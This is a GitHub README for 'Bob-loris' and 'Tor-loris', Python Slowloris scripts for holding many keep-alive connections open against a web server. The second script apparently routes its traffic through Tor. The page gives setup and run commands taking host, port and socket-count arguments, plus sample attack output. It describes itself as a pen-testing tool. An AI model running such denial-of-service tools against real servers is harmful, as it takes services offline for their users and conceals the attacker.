Skip to content

LukeBob-zz/Bob-loris

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

35 Commits
 
 
 
 
 
 
 
 

Repository files navigation

Bob-Loris

Setup

    $ git clone https://github.com/LukeBob/Bob-loris.git

    $ cd Bob-loris

    $ chmod 755 Bob-loris.py

    $ ./Bob-loris.py -H <host> -P <port> -M <max-sockets Default=150>

Example

    $ ./Bob-loris.py -H 192.168.1.160 -P 80 -M 149          

       ____        _       _            _     
      |  _ \      | |     | |          (_)    
      | |_) | ___ | |__   | | ___  _ __ _ ___ 
      |  _ < / _ \| '_ \  | |/ _ \| '__| / __|
      | |_) | (_) | |_) | | | (_) | |  | \__ \
      |____/ \___/|_.__/  |_|\___/|_|  |_|___/
                                     
                                     
      
     max socket option too low. using Default 150

   Sending Keep Alive Headers... Socket Count: 150
   Sending Keep Alive Headers... Socket Count: 150
   Sending Keep Alive Headers... Socket Count: 150
   Sending Keep Alive Headers... Socket Count: 150

Tor-Loris

Setup

    $ git clone https://github.com/LukeBob/Bob-loris.git

    $ cd Bob-loris

    $ chmod 755 Tor-loris.py

    $ ./Tor-loris.py -H <host> -P <port> -M <max-sockets Default=150>

Example

$ ./Tor-loris.py -H 192.168.1.160 -P 80 -M 150 
         _______           _            _     
        |__   __|         | |          (_)    
           | | ___  _ __  | | ___  _ __ _ ___ 
           | |/ _ \| '__| | |/ _ \| '__| / __|
           | | (_) | |    | | (_) | |  | \__ \
           |_|\___/|_|    |_|\___/|_|  |_|___/
                                                                                               
      
   Sending Keep Alive Headers... Socket Count: 150
   Sending Keep Alive Headers... Socket Count: 150
   Sending Keep Alive Headers... Socket Count: 150
   Sending Keep Alive Headers... Socket Count: 150
   Sending Keep Alive Headers... Socket Count: 150
   Sending Keep Alive Headers... Socket Count: 150
   Sending Keep Alive Headers... Socket Count: 150

About

Slow-loris Pen testing script written in python

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Languages